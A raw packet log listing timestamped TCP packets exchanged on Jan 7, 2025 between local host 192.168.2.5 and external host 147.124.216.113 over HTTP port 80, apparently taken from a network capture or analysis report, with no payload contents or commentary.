Jan 7, 2025 13:25:01.224994898 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.225033998 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.225059032 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.225075006 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.225104094 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.225109100 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.225121975 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.225132942 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.225146055 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.225177050 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.225178003 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.225214958 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.225227118 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.225238085 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.225253105 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.225254059 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.225297928 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.225353956 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.225366116 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.225379944 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.225394011 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.225405931 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.225421906 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.225421906 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.225440025 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.227406979 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.227422953 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.227442980 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.227463961 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.227473021 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.227493048 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.227510929 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.227523088 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.227545023 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.227560043 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.227572918 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.227616072 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.227623940 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.227637053 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.227648020 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.227667093 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.227689028 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.227716923 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.227766991 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.227778912 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.227790117 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.227802038 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.227819920 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.227823019 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.227840900 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.227854013 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.227864981 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.227888107 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.227888107 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.227916956 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.231359959 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.231373072 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.231385946 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.231435061 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.231477976 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.231491089 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.231503010 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.231513977 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.231528044 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.231529951 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.231573105 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.231573105 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.276180029 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.276196003 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.276209116 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.276221037 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.276294947 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.276293993 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.276315928 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.276324034 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.276330948 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.276357889 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.276386023 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.276390076 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.276398897 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.276405096 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.276417971 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.276463985 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.276604891 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.276617050 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.276628971 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.276640892 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.276659966 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.276676893 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.276686907 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.276707888 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.276709080 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.276755095 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.276767015 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.276808023 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.276822090 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.276823997 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.276840925 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.276846886 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.276859045 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.276878119 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.277020931 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.277045012 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.277079105 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.277101040 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.277132988 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.277137041 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.277154922 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.277213097 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.277225018 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.277235985 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.277250051 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.277276993 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.277276993 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.277297974 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.277415991 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.277436018 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.277446985 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.277492046 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.277504921 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.277528048 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.277578115 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.277590990 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.277604103 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.277605057 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.277616024 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.277625084 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.277626991 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.277659893 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.277688980 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.277694941 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.277818918 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.277991056 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.278019905 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.278033972 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.278040886 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.278095007 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.278111935 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.278124094 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.278136015 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.278146982 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.278182030 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.278198004 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.306657076 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.306673050 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.306703091 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.306714058 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.306729078 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.306742907 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.306751013 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.306782961 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.306808949 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.306862116 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.306879997 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.306894064 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.306915045 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.306931019 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.306945086 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.306984901 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.307010889 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.307024956 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.307046890 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.307049036 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.307060003 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.307071924 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.307086945 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.307106972 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.307106972 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.307109118 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.307121992 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.307148933 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.307163000 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.307176113 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.307190895 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.307194948 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.307194948 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.307224989 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.307291985 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.307310104 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.307329893 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.307339907 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.307373047 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.307377100 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.307389021 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.307399988 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.307415962 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.307418108 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.307418108 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.307427883 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.307444096 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.307456017 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.307466030 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.307496071 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.307496071 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.315942049 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.315954924 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.315984011 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.315994978 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.316003084 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.316021919 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.316035986 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.316059113 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.316075087 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.316080093 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.316090107 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.316102028 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.316184998 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.316217899 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.316273928 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.316292048 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.316304922 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.316307068 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.316339970 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.316361904 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.316406012 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.316411018 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.316431999 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.316445112 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.316505909 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.316548109 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.316559076 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.316570997 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.316582918 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.316616058 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.316616058 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.316693068 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.316751957 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.318582058 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.318593979 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.318604946 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.318691015 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.318770885 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.318783045 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.318806887 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.318819046 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.318824053 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.318834066 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.318856001 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.318907022 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.365117073 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.365165949 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.365178108 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.365269899 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.365323067 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.365334988 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.365345955 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.365356922 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.365367889 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.365379095 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.365390062 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.365407944 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.365407944 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.365432024 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.365442991 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.365447044 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.365458012 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.365470886 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.365483046 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.365516901 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.365516901 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.365614891 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.365664005 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.365665913 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.365677118 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.365720987 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.365732908 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.365751982 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.365760088 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.365803957 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.365861893 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.365875006 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.365888119 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.365902901 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.365915060 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.365931034 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.365931034 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.365964890 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.366007090 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.366018057 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.366028070 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.366039991 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.366050959 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.366063118 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.366074085 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.366092920 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.366157055 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.366244078 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.366261005 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.366272926 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.366297960 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.366319895 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.366331100 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.366343975 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.366354942 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.366389036 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.366390944 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.366403103 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.366414070 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.366425991 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.366440058 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.366473913 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.366712093 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.366724014 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.366734982 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.366766930 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.366770983 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.366780043 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.366791964 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.366802931 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.366823912 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.366823912 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.366854906 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.395157099 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.395175934 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.395196915 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.395210981 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.395222902 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.395231962 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.395237923 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.395251989 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.395263910 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.395301104 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.395301104 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.395353079 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.395365953 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.395379066 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.395409107 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.395452976 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.395478964 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.395498037 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.395509958 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.395515919 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.395525932 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.395561934 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.395561934 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.395629883 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.395668030 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.395682096 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.395720959 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.395730972 CET	49710	80	192.168.2.5	147.124.216.113
